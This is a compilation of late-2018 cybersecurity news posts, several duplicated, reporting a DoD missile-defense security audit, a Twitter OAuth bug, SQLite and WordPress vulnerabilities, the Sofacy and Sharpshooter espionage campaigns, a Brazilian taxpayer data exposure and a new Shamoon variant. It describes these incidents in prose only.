“In addition, officials did not encrypt data stored on removable media. The system owner for the [redacted] and the Information System Security Officer for [redacted] stated that their components did not encrypt data stored on removable media because the [redacted] did not require the use of encryption,” continues the report. “Although the [redacted] did not require data stored on removable media to be encrypted, system owners and Information System Security Officers have a responsibility to implement and enforce Federal and DoD cybersecurity policies and procedures for encrypting data stored on removable media. In May 2018, the [redacted] directed [redacted] to begin encrypting data stored on removable media using Federal Information Processing Standard 140-2 certified methods by October 9, 2018, as a condition to operate on the [redacted].”

The report also reported physical security issues such as server racks not being locked, open doors to restricted locations, and the absence of security cameras at required locations.

The report also includes the following recommendations: 

  • using multifactor authentication;
  • mitigating vulnerabilities in a timely manner;
  • protecting data on removable media;
  • implementing intrusion detection capabilities

Pierluigi Paganini

(Security Affairs – United States’ ballistic missile defense systems (BMDS), DoD)

The post US ballistic missile defense systems (BMDS) open to cyber attacks appeared first on Security Affairs.

Security Affairs newsletter Round 192 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

STOLEN PENCIL campaign, hackers target academic institutions.
WordPress botnet composed of +20k installs targets other sites
A new Mac malware combines a backdoor and a crypto-miner
Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS
Expert devised a new WiFi hack that works on WPA/WPA2
Hackers defaced Linux.org with DNS hijack
Google will shut down consumer version of Google+ earlier due to a bug
Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries
Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept
A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack
Cyber attack hit the Italian oil and gas services company Saipem
New threat actor SandCat exploited recently patched CVE-2018-8611 0day
Novidade, a new Exploit Kit is targeting SOHO Routers
French foreign ministry announced its Travel Alert Registry Hack
ID Numbers for 120 Million Brazilians taxpayers exposed online
Operation Sharpshooter targets critical infrastructure and global defense
A bug in Facebook Photo API exposed photos of 6.8 Million users
New Sofacy campaign aims at Government agencies across the world
WordPress version 5.0.1 addressed several vulnerabilities
Magellan RCE flaw in SQLite potentially affects billions of apps
Which are the worst passwords for 2018?

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 192 – News of the week appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 192 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

STOLEN PENCIL campaign, hackers target academic institutions.
WordPress botnet composed of +20k installs targets other sites
A new Mac malware combines a backdoor and a crypto-miner
Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS
Expert devised a new WiFi hack that works on WPA/WPA2
Hackers defaced Linux.org with DNS hijack
Google will shut down consumer version of Google+ earlier due to a bug
Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries
Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept
A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack
Cyber attack hit the Italian oil and gas services company Saipem
New threat actor SandCat exploited recently patched CVE-2018-8611 0day
Novidade, a new Exploit Kit is targeting SOHO Routers
French foreign ministry announced its Travel Alert Registry Hack
ID Numbers for 120 Million Brazilians taxpayers exposed online
Operation Sharpshooter targets critical infrastructure and global defense
A bug in Facebook Photo API exposed photos of 6.8 Million users
New Sofacy campaign aims at Government agencies across the world
WordPress version 5.0.1 addressed several vulnerabilities
Magellan RCE flaw in SQLite potentially affects billions of apps
Which are the worst passwords for 2018?

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 192 – News of the week appeared first on Security Affairs.



Security Affairs

Cyber Security Project Investment Proposal – DIA Needipedia – Fight Cybercrime and Cyber Jihad With Sensors – Grab Your Copy Today!

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on request part of DIA's Needipedia Project Proposal Investment draft or eventually through the Smith Richardson Foundation. In case you're interested in working with me

Security Affairs: Twitter fixed bug could have exposed Direct Messages to third-party apps

Researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party.

The flaw is triggered when apps that require a PIN to complete the authorization process instead of the using the OAuth protocol. The expert discovered that some permissions such as that to access direct messages, remained hidden to the Twitter user.

Terence Eden was awarded $2,940 for reporting the bug to Twitter under the bug bounty program operated through the HackerOne platform. According to Eden, the bug resides in the way the official Twitter API handles keys and secrets that could be accessed by app developers even without the service’s authorization.

“Many years ago the official Twitter API keys were leaked. This means that app authors who can’t get their app approved by Twitter are still able to access the Twitter API.” wrote Eden.

“For some reason, Twitter’s OAuth screen says that these apps do not have access to Direct Messages. But they do!

In short, users could be tricked into allowing access to their DMs.”

Twitter implemented some restrictions, the most important one is restricting callback addresses. After successful login, the apps will only return to a predefined URL preventing the abuse of the official Twitter keys to send the user to your app.

The problem is that there are some apps that haven’t a URL or don’t support callbacks. For these apps, Twitter has implemented an alternative authorisation mechanism, users log in, it provides a PIN, they type the PIN into their app.

Twitter direct messages flaw

In this alternative scenario, Eden discovered that apps did not show the correct OAuth details to the user, in particular, that the app was not able to access user direct messages.

Below the bug timeline:

  • 2018-11-06 Submitted via HackerOne
  • 2018-11-06 Provided clarification and PoC. Issue accepted.
  • 2018-11-15 Proposed publication date of 30th November rejected due to US holidays.
  • 2018-11-16 Bug Bounty of $2,940 offered. Filled in the W2 form to say I’m not a US taxpayer.
  • 2018-11-17 Drank a fair amount of cider.
  • 2018-11-21 £2,287.05 deposited in my UK bank account. There was also the option of receiving it via PayPal.
  • 2018-12-06 Twitter fixed the issue and published the bounty payout. They let me know I was clear to publish.
  • 2018-12-14 Published this report.

Pierluigi Paganini

(Security Affairs –Twitter,  hacking)

The post Twitter fixed bug could have exposed Direct Messages to third-party apps appeared first on Security Affairs.



Security Affairs

Twitter fixed bug could have exposed Direct Messages to third-party apps

Researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party.

The flaw is triggered when apps that require a PIN to complete the authorization process instead of the using the OAuth protocol. The expert discovered that some permissions such as that to access direct messages, remained hidden to the Twitter user.

Terence Eden was awarded $2,940 for reporting the bug to Twitter under the bug bounty program operated through the HackerOne platform. According to Eden, the bug resides in the way the official Twitter API handles keys and secrets that could be accessed by app developers even without the service’s authorization.

“Many years ago the official Twitter API keys were leaked. This means that app authors who can’t get their app approved by Twitter are still able to access the Twitter API.” wrote Eden.

“For some reason, Twitter’s OAuth screen says that these apps do not have access to Direct Messages. But they do!

In short, users could be tricked into allowing access to their DMs.”

Twitter implemented some restrictions, the most important one is restricting callback addresses. After successful login, the apps will only return to a predefined URL preventing the abuse of the official Twitter keys to send the user to your app.

The problem is that there are some apps that haven’t a URL or don’t support callbacks. For these apps, Twitter has implemented an alternative authorisation mechanism, users log in, it provides a PIN, they type the PIN into their app.

Twitter direct messages flaw

In this alternative scenario, Eden discovered that apps did not show the correct OAuth details to the user, in particular, that the app was not able to access user direct messages.

Below the bug timeline:

  • 2018-11-06 Submitted via HackerOne
  • 2018-11-06 Provided clarification and PoC. Issue accepted.
  • 2018-11-15 Proposed publication date of 30th November rejected due to US holidays.
  • 2018-11-16 Bug Bounty of $2,940 offered. Filled in the W2 form to say I’m not a US taxpayer.
  • 2018-11-17 Drank a fair amount of cider.
  • 2018-11-21 £2,287.05 deposited in my UK bank account. There was also the option of receiving it via PayPal.
  • 2018-12-06 Twitter fixed the issue and published the bounty payout. They let me know I was clear to publish.
  • 2018-12-14 Published this report.

Pierluigi Paganini

(Security Affairs –Twitter,  hacking)

The post Twitter fixed bug could have exposed Direct Messages to third-party apps appeared first on Security Affairs.

Security Affairs: Which are the worst passwords for 2018?

Which are the worst passwords for 2018? SplashData report confirms that  123456 is the most used password for the 5th year in a row

Bad habits are hard to die, 123456 is the most used password for the 5th year in a row followed by “password”.

Even if security experts continue to make awareness campaign, people continue to use bad habits exposing their data to the risk of hack.

SplashData published for the 8th year in a row the worst passwords list, the annual report is based on the analysis of more than 5 million leaked passwords.

Below the 2018 top 10 most used passwords are:

  1. 123456
  2. password 
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567 
  8. sunshine
  9. qwerty
  10. iloveyou

“Bad habits die hard, according to SplashData’s eighth annual list of Worst Passwords of the Year. After evaluating more than 5 million passwords leaked on the Internet, the company found that computer users continue using the same predictable, easily guessable passwords.” reads the
press release published by SplashData.

“Using these passwords will put anyone at substantial risk of being hacked and having their identities stolen.” 

This year, President Trump appeared for the first time in the list of the worst password with “donald” showing up as the 23rd most frequently used password.

Unfortunately, people are still using celebrity names, terms from pop culture and sports, and simple keyboard patterns, a gift for hackers that can use them to compromise their online accounts.

“Our hope by publishing this list each year is to convince people to take steps to protect themselves online,” said Morgan Slain, CEO of SplashData, Inc. “It’s a real head-scratcher that with all the risks known, and with so many highly publicized hacks such as Marriott and the National Republican Congressional Committee, that people continue putting themselves at such risk year-after-year.”

Experts suggest the adoption of string passwords and the usage of a unique password for every service they access. Passwords should contain at least 8 characters, upper and lower case letters, numbers, and symbols (i.e. %$#!.). 

Pierluigi Paganini

(Security Affairs – passwords, hacking)

The post Which are the worst passwords for 2018? appeared first on Security Affairs.



Security Affairs

Which are the worst passwords for 2018?

Which are the worst passwords for 2018? SplashData report confirms that  123456 is the most used password for the 5th year in a row

Bad habits are hard to die, 123456 is the most used password for the 5th year in a row followed by “password”.

Even if security experts continue to make awareness campaign, people continue to use bad habits exposing their data to the risk of hack.

SplashData published for the 8th year in a row the worst passwords list, the annual report is based on the analysis of more than 5 million leaked passwords.

Below the 2018 top 10 most used passwords are:

  1. 123456
  2. password 
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567 
  8. sunshine
  9. qwerty
  10. iloveyou

“Bad habits die hard, according to SplashData’s eighth annual list of Worst Passwords of the Year. After evaluating more than 5 million passwords leaked on the Internet, the company found that computer users continue using the same predictable, easily guessable passwords.” reads the
press release published by SplashData.

“Using these passwords will put anyone at substantial risk of being hacked and having their identities stolen.” 

This year, President Trump appeared for the first time in the list of the worst password with “donald” showing up as the 23rd most frequently used password.

Unfortunately, people are still using celebrity names, terms from pop culture and sports, and simple keyboard patterns, a gift for hackers that can use them to compromise their online accounts.

“Our hope by publishing this list each year is to convince people to take steps to protect themselves online,” said Morgan Slain, CEO of SplashData, Inc. “It’s a real head-scratcher that with all the risks known, and with so many highly publicized hacks such as Marriott and the National Republican Congressional Committee, that people continue putting themselves at such risk year-after-year.”

Experts suggest the adoption of string passwords and the usage of a unique password for every service they access. Passwords should contain at least 8 characters, upper and lower case letters, numbers, and symbols (i.e. %$#!.). 

Pierluigi Paganini

(Security Affairs – passwords, hacking)

The post Which are the worst passwords for 2018? appeared first on Security Affairs.

Magellan RCE flaw in SQLite potentially affects billions of apps

Security experts at Tencent’s Blade security team discovered the Magellan RCE flaw in SQLite database software that exposes billions of vulnerable apps.

Security experts at Tencent’s Blade security team have discovered a critical vulnerability in SQLite database software that exposes billions of vulnerable apps to hackers.

The vulnerability tracked as ‘Magellan‘ could allow remote attackers to execute arbitrary on vulnerable devices, leak program memory or cause dos condition with application crash.

“Magellan is a remote code execution vulnerability discovered by Tencent Blade Team that exists in SQLite. As a well-known database, SQLite is widely used in all modern mainstream operating systems and software, so this vulnerability has a wide range of influence. ” reads a blog post published by the Tencent Blade Team.

SQLite is a widely adopted relational database management system contained in a C programming library. Unlike many other database management systems, SQLite is not a client–server database engine. Rather, it is embedded into the end program.

SQLite is used by millions of applications with billions of installs, Magellan potentially affects IoT devices, macOS and Windows apps.

Experts also tested Chromium and discovered it was affected too, Google has confirmed and fixed this issue.

Chromium-based web browser such as Google Chrome, Opera, Vivaldi, and Brave also support SQLite through the deprecated Web SQL database API.

Experts warn that a remote attacker can easily target people using vulnerable browsers by tricking them visiting a specially crafted web-page.

“After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability. We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible.” continues the post.

SQLite version 3.26.0 addresses the Magellan flaw, Google released Chromium version 71.0.3578.80 to fix the issue and rolled out the patched version to the latest version of Google Chrome and Brave web-browsers.

The Tencent experts said they successfully build a proof-of-concept exploit using the Magellan flaw that worked against Google Home.

Experts did not disclose the exploit to allow development teams to address flawed applications. The good news is that experts have not seen attacks abusing the Magellan flaw yet.

Users and administrators have to update their systems and vulnerable applications as soon as possible.

Pierluigi Paganini

(Security Affairs –Magellan flaw, hacking)

The post Magellan RCE flaw in SQLite potentially affects billions of apps appeared first on Security Affairs.

Hackers bypassed Gmail & Yahoo’s 2FA to target US officials

By Waqas

The attack was carried out by Iran-backed charming kitten hackers and victims include dozens of US government officials. Private emails of US sanctions officials and nuclear scientists have been breached by Iranian state-sponsored hackers. As per the data obtained by Certfa, a cybersecurity firm based in London, the hacking group Charming Kitten is responsible for the […]

This is a post from HackRead.com Read the original post: Hackers bypassed Gmail & Yahoo’s 2FA to target US officials

Chinese hackers reportedly hit Navy contractors with multiple attacks

Chinese hackers have been targeting US Navy contractors, and were reportedly successful on several occasions over the last 18 months. The infiltrators stole information including missile plans and ship maintenance data, according to a Wall Street Journal report that cites officials and security experts.

Source: Wall Street Journal

Security Affairs: WordPress version 5.0.1 addressed several vulnerabilities

This week, the WordPress development team released on Thursday the version 5.0.1 of the popular CMS, that addresses several flaws.

The Researcher Tim Coen discovered several cross-site scripting (XSS) vulnerabilities in the CMS. One of the flaws is caused by the ability of contributors to edit new comments from users with higher privileges.
Coen also discovered that it is possible to trigger XSS flaws by using  specially crafted URL input against some plugins.

Coen along with the researcher Slavco Mihajloski discovered an XSS vulnerability that allows authors on websites running on Apache servers to upload specially crafted files that bypass the MIME verification.

“Prior to 5.0.1, WordPress did not require uploaded files to pass MIME type verification, so files could be uploaded even if the contents didn’t match the file extension. For example, a binary file could be uploaded with a .jpg extension,” wrote WordPress developer Ian Dunn. “This is no longer the case, and the content of uploaded files must now match their extension. Most valid files should be unaffected, but there may be cases when a file needs to be renamed to its correct extension (e.g., an OpenOffice doc going from .pptx to .ppxs).”

Another flaw discovered by experts at Yoast affects some uncommon configurations and causes the user activation screen being indexed by search engines. This could lead the exposure of email addresses and some default passwords in “some rare cases.”

Karim El Ouerghemmi discovered that security issues allows authors to alter metadata and delete files that they normally would not be authorized to delete.

Security expert Sam Thomas discovered that contributors could use specially crafted metadata for PHP object injection.

The last flaw was discovered by Simon Scannell from RIPS Technologies, il could be exploited by authors using specially crafted input to create posts of unauthorized types.

Security updates that addressed the above flaws have been released for WordPress 4.9 and older releases. Version 5.0 already includes the fixes.

Pierluigi Paganini

(Security Affairs –WordPress, security)

The post WordPress version 5.0.1 addressed several vulnerabilities appeared first on Security Affairs.



Security Affairs

WordPress version 5.0.1 addressed several vulnerabilities

This week, the WordPress development team released on Thursday the version 5.0.1 of the popular CMS, that addresses several flaws.

The Researcher Tim Coen discovered several cross-site scripting (XSS) vulnerabilities in the CMS. One of the flaws is caused by the ability of contributors to edit new comments from users with higher privileges.
Coen also discovered that it is possible to trigger XSS flaws by using  specially crafted URL input against some plugins.

Coen along with the researcher Slavco Mihajloski discovered an XSS vulnerability that allows authors on websites running on Apache servers to upload specially crafted files that bypass the MIME verification.

“Prior to 5.0.1, WordPress did not require uploaded files to pass MIME type verification, so files could be uploaded even if the contents didn’t match the file extension. For example, a binary file could be uploaded with a .jpg extension,” wrote WordPress developer Ian Dunn. “This is no longer the case, and the content of uploaded files must now match their extension. Most valid files should be unaffected, but there may be cases when a file needs to be renamed to its correct extension (e.g., an OpenOffice doc going from .pptx to .ppxs).”

Another flaw discovered by experts at Yoast affects some uncommon configurations and causes the user activation screen being indexed by search engines. This could lead the exposure of email addresses and some default passwords in “some rare cases.”

Karim El Ouerghemmi discovered that security issues allows authors to alter metadata and delete files that they normally would not be authorized to delete.

Security expert Sam Thomas discovered that contributors could use specially crafted metadata for PHP object injection.

The last flaw was discovered by Simon Scannell from RIPS Technologies, il could be exploited by authors using specially crafted input to create posts of unauthorized types.

Security updates that addressed the above flaws have been released for WordPress 4.9 and older releases. Version 5.0 already includes the fixes.

Pierluigi Paganini

(Security Affairs –WordPress, security)

The post WordPress version 5.0.1 addressed several vulnerabilities appeared first on Security Affairs.

Security Affairs: New Sofacy campaign aims at Government agencies across the world

Security experts at Palo Alto Networks uncovered a new espionage campaign carried out by Russia-Linked APT group Sofacy.

Russian Cyber espionage group Sofacy (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium)) carried out a new cyber campaign aimed at government agencies in four continents in an attempt to infect them with malware.

The campaign has been focusing on Ukraine and NATO members like it has done in past attacks.

Earlier December the group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU). In November experts at Palo Alto Networks documents a new malware, dubbed Cannon in attacks on government entities worlwide.

The latest campaign documented by Palo Alto Networks was carried out from mid-October through mid-November, attackers used both the
Zebrocy backdoor and Cannon Trojan. 

Researchers noticed that in all the attacks threat actors used decoy documents that have the same author name Joohn.

“The delivery documents used in the October and November waves shared a large number of similarities, which allowed us to cluster the activity together. Most notably, the author name Joohn was used repeatedly in each delivery document.” reads the analysis published by Palo Alto Networks.

“There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field.”

Palo Alto Networks identified a total of 9 documents and associated payloads and targets.

Once opened a document, it will leverage the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document.

“If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session.” continues the report.

“The victim will then see a prompt to Enable Content as with any malicious macro document. If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded”

Sofacy bait

The latest Sofacy campaign hit targets around the world, including a foreign affairs organization in North America, foreign affairs organizations in Europe, as well as government entities in former USSR states. Experts also discovered evidence of possible targeting of local law enforcement agencies worldwide (i.e. North America, Australia, and Europe.) 

Palo Alto Networks reveals that, in addition to the delivery documents themselves, the remote templates too shared a common author name. The security researchers also noticed that the servers hosting the remote templates also hosted the C&C for the first-stage payloads.

Sofacy attackers used different variants of the Zebrocy malware and the Cannon backdoor. Palo Alto Networks identified a Cannon variant written in Delphi, variants of Zebrocy written in C# and VB.NET.

“The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques.” concludes the analysis.

“The group clearly shows a preference for using a simple downloader like Zebrocy as first-stage payloads in these attacks. The group continues to develop new variations of Zebrocy by adding a VB.NET and C# version, and it appears that they also have used different variants of the Cannon tool in past attack campaigns,” 

Pierluigi Paganini

(Security Affairs –Sofacy, cyber espionage)

The post New Sofacy campaign aims at Government agencies across the world appeared first on Security Affairs.



Security Affairs

New Sofacy campaign aims at Government agencies across the world

Security experts at Palo Alto Networks uncovered a new espionage campaign carried out by Russia-Linked APT group Sofacy.

Russian Cyber espionage group Sofacy (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium)) carried out a new cyber campaign aimed at government agencies in four continents in an attempt to infect them with malware.

The campaign has been focusing on Ukraine and NATO members like it has done in past attacks.

Earlier December the group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU). In November experts at Palo Alto Networks documents a new malware, dubbed Cannon in attacks on government entities worlwide.

The latest campaign documented by Palo Alto Networks was carried out from mid-October through mid-November, attackers used both the
Zebrocy backdoor and Cannon Trojan. 

Researchers noticed that in all the attacks threat actors used decoy documents that have the same author name Joohn.

“The delivery documents used in the October and November waves shared a large number of similarities, which allowed us to cluster the activity together. Most notably, the author name Joohn was used repeatedly in each delivery document.” reads the analysis published by Palo Alto Networks.

“There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field.”

Palo Alto Networks identified a total of 9 documents and associated payloads and targets.

Once opened a document, it will leverage the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document.

“If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session.” continues the report.

“The victim will then see a prompt to Enable Content as with any malicious macro document. If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded”

Sofacy bait

The latest Sofacy campaign hit targets around the world, including a foreign affairs organization in North America, foreign affairs organizations in Europe, as well as government entities in former USSR states. Experts also discovered evidence of possible targeting of local law enforcement agencies worldwide (i.e. North America, Australia, and Europe.) 

Palo Alto Networks reveals that, in addition to the delivery documents themselves, the remote templates too shared a common author name. The security researchers also noticed that the servers hosting the remote templates also hosted the C&C for the first-stage payloads.

Sofacy attackers used different variants of the Zebrocy malware and the Cannon backdoor. Palo Alto Networks identified a Cannon variant written in Delphi, variants of Zebrocy written in C# and VB.NET.

“The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques.” concludes the analysis.

“The group clearly shows a preference for using a simple downloader like Zebrocy as first-stage payloads in these attacks. The group continues to develop new variations of Zebrocy by adding a VB.NET and C# version, and it appears that they also have used different variants of the Cannon tool in past attack campaigns,” 

Pierluigi Paganini

(Security Affairs –Sofacy, cyber espionage)

The post New Sofacy campaign aims at Government agencies across the world appeared first on Security Affairs.

IT consultancy firm caught running ransomware decryption scam

By Waqas

Ransomware has become a persistent threat to users globally but for cybercriminals, it is a lucrative business. Recently, IT security researchers at Check Point unearthed a sophisticated ransomware decryption scam in which a Russian IT consultant company has been caught scamming ransomware victims. The company according to Check Point researchers calls itself ‘Dr. Shifro’ and claims to provide […]

This is a post from HackRead.com Read the original post: IT consultancy firm caught running ransomware decryption scam

French foreign ministry announced its Travel Alert Registry Hack

The French foreign ministry announced today that its travel alert registry website had been hacked and personal data of citizens “could be misused”.

The French foreign ministry confirmed tha hackers breached into
the Ariane system, its travel alert registry website, and personal data of citizens “could be misused”.

The Ariane system provides security alerts to registered users when traveling abroad. At the time there aren’t technical details about the intrusion or the number of affected people.

“Users reported receiving emails notifying them that their names, cellphone numbers and email addresses may have been stolen, but the ministry said none of the data was “sensitive” or “of a financial nature”.” reported the AFP press.

statement did not indicate who might be behind the attack.

The ministry started notifying the incident to the affected users, it also informed media to have taken necessary measures to avoid similar incidents in the future.

“We immediately took the necessary measures to ensure this type of incident would not happen again,” it said.

The Ministry confirmed that the site was now secured.

Pierluigi Paganini

(Security Affairs –Travel Alert Registry, hacking)

The post French foreign ministry announced its Travel Alert Registry Hack appeared first on Security Affairs.

Operation Sharpshooter targets critical infrastructure and global defense

McAfee uncovered a campaign tracked as Operation Sharpshooter that hit at least 87 organizations in global defense and critical infrastructure.

Security experts at McAfee uncovered a hacking campaign, tracked as Operation Sharpshooter, aimed at infrastructure companies worldwide. The threat actors are using malware associated with Lazarus APT group that carried out Sony Pictures attack back in 2014.

The current campaign os targeting nuclear, defense, energy, and financial companies, experts believe attackers are gather intelligence to prepare future attacks.

“In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis.” reads the analysis published by McAfee.

“Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest.”

Operation Sharpshooter

Threat actors are carrying out spear phishing attacks with a link poining to weaponized Word documents purporting to be sent by a job recruiter. The messages are in English and include descriptions for jobs at unknown companies, URLs associated with the documents belongs to a US-based IP address and to the Dropbox service.

The macros included in the malicious document uses an embedded shellcode to inject the Sharpshooter downloader into Word’s memory.

The macros act as a downloader for a second-stage implant dubbed Rising Sun that runs in memory and collects intelligence about the machine (network adapter information, computer name, username, IP address information, OS information, drive and process information, and other native system data). 
The Rising Sun implements tens of backdoor capabilities, including the abilities to terminate processes and write files to disk.

The binary is downloaded in the startup folder to gain persistence on the infected system. Experts observed that attackers behind the Operation Sharpshooter also downloads a second harmless Word document from the control server, most likely as a decoy to hide the malware.

The malware sends collected data to the C2 in an encrypted format, it uses the RC4 algorithm and encodes the encrypted data with Base64.

The control infrastructure is composed of servers located in the US, Singapore, and France.

Experts highlighted that the Rising Sun uses source code from Trojan Duuzer, a backdoor used by Lazarus Group in Sony attacks.

“This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.” continues the report.

Experts found other similarities, for example the documents that are being used to distribute Rising Sun contain metadata indicating they were created using a Korean-language version of Word.

Experts found many similarities between the malware used in the 
Operation Sharpshooter and the one used in the Sony hack, experts also found similarities in tactics, techniques, and procedures used by the attackers and the Lazarus Group.

Experts believe that threat actors behind Operation Sharpshooter are planting false flags to make attribution more difficult.

Further details on the campaign, including IoCs are reported in the analysis published by McAfee.

Pierluigi Paganini

(Security Affairs – Operation Sharpshooter, hacking)



The post Operation Sharpshooter targets critical infrastructure and global defense appeared first on Security Affairs.

Marriott Hack Reported as Chinese State-Sponsored

The New York Times and Reuters are reporting that China was behind the recent hack of Marriott Hotels. Note that this is still uncomfirmed, but interesting if it is true.

Reuters:

Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company's private probe into the attack.

That suggests that Chinese hackers may have been behind a campaign designed to collect information for use in Beijing's espionage efforts and not for financial gain, two of the sources said.

While China has emerged as the lead suspect in the case, the sources cautioned it was possible somebody else was behind the hack because other parties had access to the same hacking tools, some of which have previously been posted online.

Identifying the culprit is further complicated by the fact that investigators suspect multiple hacking groups may have simultaneously been inside Starwood's computer networks since 2014, said one of the sources.

I used to have opinions about whether these attributions are true or not. These days, I tend to wait and see.

ID Numbers for 120 Million Brazilians taxpayers exposed online

InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers for 120 million Brazilian taxpayers

In March 2018, security experts at InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers, or Cadastro de Pessoas Físicas (CPFs), for 120 million Brazilian nationals. It is not clear how long data remained exposed online or who accessed them.

Every Brazilian national has assigned a taxpayer identification number that allows him to perform ordinary operations, such as opening a bank account, paying taxes, or getting a loan.

Experts discovered the file index.html_bkp on the Apache server (likely a backup of the index.html), which caused the web server to display the list of the files and folder stored in that folder and download them.

The folder included data archives ranging in size from 27 megabytes to 82 gigabytes.

Experts at InfoArmor discovered that one of the archive contained data related to Cadastro de Pessoas Físicas (CPFs), personal information, military info, telephone, loans, and addresses. 

“CPFsare an identification number issued by the Brazilian Federal Reserve to Brazilian citizens and tax-paying residentaliens, and each exposed CFP linked to an individual’s banks, loans, repayments, credit and debit history, voting history, full name, emails, residential addresses, phone numbers, date of birth, family contacts, employment, voting registration numbers, contract numbers, and contract amounts.” reads the report published by InfoArmor.

Brazilian taxpayer directory-listing-red 2.jpg


Experts believe that directory was used to store database backups. While InfoArmor was attempting to report the discovery to owner of the database, someone replaced the 82 GB file a raw 25 GB .sql file.

In the days following the initial discovery, InfoArmor’s research team attempted to determine who owned the server so they could be notified. During this time, InfoArmor observed that one of the files, an 82 GB file, had been replaced by a raw .sql file 25 GB in size, though its filename remained the same.” continues the report.

“This swap suggests a human intervened. It is possible that a server administrator had discovered the leak, however the server remained unsecured for weeks after this swap”

InfoArmor was any way able to contact the hosting provider that secured the directory by the end of March.

A question remains without response, why this kind of data was exposed a third-party server.

“It is safe to assume that any intelligence organization or cybercrime group with reasonable collection capabilitiesand expertise will have captured this data. This data could very likely be used against the population of Brazil, thenation of Brazil, or any nations hosting people who have a CFP.” concludes InfoArmor.

Pierluigi Paganini

(Security Affairs – Brazilian Taxpayers, data leak)

The post ID Numbers for 120 Million Brazilians taxpayers exposed online appeared first on Security Affairs.

A New Year’s Resolution: Security is Broken…Let’s Fix It

As we near the end of 2018, another wave of massive cyber-attacks has exposed personally identifiable information belonging to hundreds of millions of people and will cost the impacted businesses

The post A New Year’s Resolution: Security is Broken…Let’s Fix It appeared first on The Cyber Security Place.

A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack

A new variant of the Shamoon malware, aka DistTrack, was uploaded to VirusTotal from Italy this week, but experts haven’t linked it to a specific attack yet.

Shamoon was first observed in 2012 when it infected and wiped more than 30,000 systems at Saudi Aramco and other oil companies in the Middle East.

Four years later, a new version (Shamoon 2) appeared in the threat landscape, it was involved in a string of cyber attacks aimed at various organizations in the Persian Gulf, including Saudi Arabia’s General Authority of Civil Aviation (GACA). 

A second variant of the same threat was discovered by researchers at Palo Alto Networks in January 2017 and it was able to target virtualization products.

DistTrack is able to wipe data from hard drives of the infected systems and render systems unusable. Like other malware, Shamoon leverages Windows Server Message Block (SMB) to spread among systems of the target network.

The code of the original Shamoon includes a list of hard-coded domain credentials used to the target a specific organization and steal credentials, but a variant uploaded to VirusTotal this week doesn’t contain these credentials.

Google security firm Chronicle discovered a file containing Shamoon uploaded to its VirusTotal database.

“The new Shamoon was set to detonate on Dec. 7, 2017, at 11:51 pm, but only uploaded yesterday.reported  Axios website.

“Chronicle notes that attackers may have set the attack date to the past — perhaps by changing 2018 to 2017 — in order to start an attack immediately. Another possibility, said Brandon Levene, head of applied intelligence at Chronicle, is that the malware was compiled in the past as part of preparations for a later attack.”

Unlike the Shamoon2, the new version contains a much longer filename list used for selecting a dropped executable name. The new list does not overlap with previously observed versions of Shamoon.

The new variant presents other anomalies, for example, the list of the command and control server was blank. Experts at Chronicle believe that attackers may have a different connection to the host network and manually install Shamoon.

Another difference is that Shamoon in the past has replaced all files with images that had political significance. The latest variant irreversibly encrypts the files.

